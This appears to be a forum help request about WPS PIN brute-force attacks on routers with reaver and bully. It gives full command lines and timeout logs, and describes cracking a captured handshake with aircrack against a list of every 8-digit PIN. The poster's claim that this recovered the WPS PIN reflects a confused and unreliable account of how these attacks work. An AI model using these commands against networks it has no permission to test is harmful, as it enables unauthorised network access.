I have been trying out reaver and bully on my network and my friend's network, on multiple different routers, but neither of them finds anything.
The command for reaver that I run is:
reaver -i wlan0mon -c 6 -b xx:xx:xx:xx:xx:xx -vv -N -L -S -K 1
The output I get is below; it keeps saying receive timeout. I tried getting closer to the network, even sitting beside it, with the same problem:
[+] Switching wlan0mon to channel 6
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Received beacon from xx:xx:xx:xx:xx:xx
[+] Vendor: AtherosC
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: xxxxx)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
The last two lines just keep getting repeated. I tried different parameters too.
The bully command I run looks like this:
bully wlan0mon -b xx:xx:xx:xx:xx:xx -c 6 -v 3 -d
The output:
[!] Bully v1.1 - WPS vulnerability assessment utility
[P] Modified for pixiewps by AAnarchYY(aanarchyy@gmail.com)
[+] Switching interface 'wlan0mon' to channel '6'
[!] Using 'xx:xx:xx:xx:xx:xx' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from 'xx:xx:xx:xx:xx:xx' on channel '6'
[+] Got beacon for 'xxxx' (xx:xx:xx:xx:xx:xx)
[+] Loading randomized pins from '/root/.bully/pins'
[!] Restoring session from '/root/.bully/xxxxxxxxxxxx.run'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '62121651'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '62121651'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '62121651'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '62121651'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '62121651'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Assn ) = 'Timeout' Next pin '62121651'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '62121651'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '62121651'
Sometimes bully works, and reaver too (very rarely), but they never get anything; it is always pin not found. Am I doing something wrong?
I got tired of the errors and tried my own method. What I did was create a list of all 8-digit combinations, so from 00000000 to 9999999, then I used aircrack to bruteforce the text file, and it actually found the pin for both routers, mine and my friend's. I know that all WPS-enabled routers have an 8-digit pin, and all 8-digit pins are listed in my text file. My problem, however, is that not all WPS routers use this pin; a router can have a PSK that is different from the pin. I bruteforce the .cap file from airodump-ng.
So to sum up, these are my questions:
- Am I doing anything wrong with reaver / bully?
- Is it possible to get the WPS key by bruteforcing with my pin list, even though the router uses another password like "fj93jfo" instead of the 8 digit key, and the router is WPS enabled and not locked?